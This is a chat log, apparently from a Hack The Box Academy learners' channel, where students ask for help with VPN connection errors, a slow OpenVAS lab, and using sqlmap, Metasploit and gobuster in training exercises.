sorry but i did not know it is prohibited
but what is the reason?
I mean it doesn't actually ping
No idea brother
I'm not a part of Moderation or Staff
ok thanks
can i ask you in DM?
ok thanks
what module you working on?
Introduction to Bash Scripting -->Flow Control - Loops
ok you can dm me think I could help with that
I have a question relating to sqlmap ... how do you discover prefixes or suffixes needed to make your injection work ... in the module they kind of give that info but how do you discover it?
Please my openvpn on hack the box don't connect it's only showing me UDPV4 link local not bound Tlc error
UDPv4 link remote [AF_INET]
Try using the tcp connection instead
Alright
Did not work
Attempting to establish TCP connection with [AF_INET]38.46.224.104:443
2023-08-01 02:53:06 TCP: connect to [AF_INET]38.46.224.104:443 failed: Connection timed out
2023-08-01 02:53:06 SIGUSR1[connection failed(soft),connection-failed] received, process restarting
this is what it keeps on telling me
Try a different region
okay
it works, thank you so much
for over 5 days now i have been suffering for these..
Always try all available options to you first
alright
OpenVAS Skills Assessment is so intermittent!
Anyone have details on the HTTP server?
^
Seriously, I'm doing the same thing, but it's not even connecting to the scans properly
To be more detailed I can see the "Results" under scans, but the minute I click on anything I get an error
Ah
Feels like the 92 employee manufacturing company intranet is being run on a Raspberry Pi 1 Model B+.
How long did you wait to connect and check?
Sometimes these can take 5-10 minutes just to fully load properly
I just tried again, at least a solid 10 min.
I'm not saying you are not allowed to ask questions, I'm telling you that everything you posted was related to spoilers of an exercise from a tier 1 module
Okay, so I finally got it to connect and it let me click on one link before going back to loading slowly.
I filtered by "http server" and I get a lot of results
too many to wait 10+ minutes between each
Might it have something to do with cleartext?
Where would I find that information?
OpenVAS was a trainwreck. I could not for the life of me get anything to load. Not only that, if it did load, there was no evidence of the "7 worded vulnerability associated with the HTTP server"
I had to rely on third parties to provide me the information. How discouraging!
Eh it's moreso the lab environment was not being friendly
Not so much "finding out Google exists"
If you scroll up they literally show an error they are getting client-side of the spawned vm
hi!

hey how can i connect to retired machine
You need vip also wrong channel
free one also
Use the right vpn
We honestly don't care
So anyway, got a bit of ¯\_(ツ)_/¯ on the OpenVAS issue. @rare topaz @maiden jetty
Any resolution?
see above #modules message
what does that mean?
Anyone else care to expound on these details?
means the lab is working for other people
ATTACKING COMMON APPLICATIONS > Attacking Tomcat: Is there any special configuration that I need to take note of when running metasploit's tomcat_mgr_upload exploit? I am able to exploit the vulnerability by creating a .war file via msfvenom, but haven't been able to automate it using metasploit
It is working 100% fine on my machine (note I used a tethered mobile network to test, and it works)
And in pwnbox
:)
Yeah, working great now!
Besides that, how was I supposed to find the cleartext?!
Scan > reports, click on the date/timestamp
Then there's the first tab on the right
It took me a minute because i forgot how frustrating openvas gui was
I clicked on the older timestamp for the Linux one
And it was there :)
Pre-filtered
Got it, I see it now that I'm not waiting 20 min between connectivity issues
pwnbox was being weird for me but I chalk it up to me using tethering ¯\_(ツ)_/¯
Thanks for the help, looks like the network is doing fine now!
why are you running dns enumeration
for practice
and to have a better understanding of it
also just figured out that I didn't need to add a port number
either way I'm still a bit confused as to what to do. It's saying I have everything I need to log in but I don't see a place to log in
unless I need to use SSH
it does not say to log in
dns enumeration doesnt do anything if you dont have a domain to work with
you ABSOLUTELY need that port to continue
So then what is the hint telling me?
its a docker instance
if you target other stuff on the server youll have a bad time
to use the methods taught in the section to find the information
I'm lost
if I'm not supposed to use gobusters or enumeration (which is what's being taught on this lesson) then what am I supposed to use to find the flag?
you are supposed to perform enumeration and use gobuster
that doesn't mean you're supposed to use DNS enumeration against an empty domain
go through the section and make sure you understand what it's teaching
unfortunately you could be lacking some fundamentals then
I'm in the fundamentals
you can be lacking fundamentals for the fundamentals ¯\_(ツ)_/¯
That's not very helpful
when I say fundamentals I mean like basic networking, linux, windows fundamentals stuff
not hacking related
I've used both linux and windows for a long time now, I have not needed to use any of this stuff
And I could be wrong, I'm just saying that's one possibility why the section may be challenging for you
madf0x already gave you great advice: "go through the section and make sure you understand what its teaching". If that isn't the way try something else explained there
I do not know your full circumstances and capabilities to say anything definitively
yup, and if theres a specific part you don't understand, ask about that
I see now that Public Exploits exists to teach the K.I.S.S method along with Metasploit...
I'm looking through it but some parts give inconclusive results. As sure they work and I get it but I don't understand how to use it to search for the flag. I know I need to look through directories and files to search for it but sometimes it gets confusing especially when the server connection craps out.
I understand that Gobuster is a tool for remote file searching
I get that
a lot of hacking is an iterative process, there's a constant cycling between enumeration and exploitation. You won't necessarily know what you're looking for until you've looked for it.
The section wants you to perform the enumeration steps and see if you can notice anything that stands out
part of the lacking resources causing frustration ig.
wdym lacking resources?
It was in the "how to learn" module
explaining the learning process of the human brain
what about it
Keep the hint in mind and read back through the lesson.
Pivoting, Tunneling, and Port Forwarding Skill Assessment i got the dc's ip 172.16.10.X. this is right?
I'm not sure I understand this
its saying that we can add a dns server but I don't understand why
or if I need to
if so how would I do so?
gobuster dns is a sub-domain scan. Remember enumeration is for building a map of the target before you try and navigate it. The more information the better.
Ok, but when I try to use it it doesn't give much results because I'm using a subdomain
^
at least that's my understanding
The lesson is for webservers. Try looking at it in the browser of the box.
yep but hint you don't need to do anything with the DC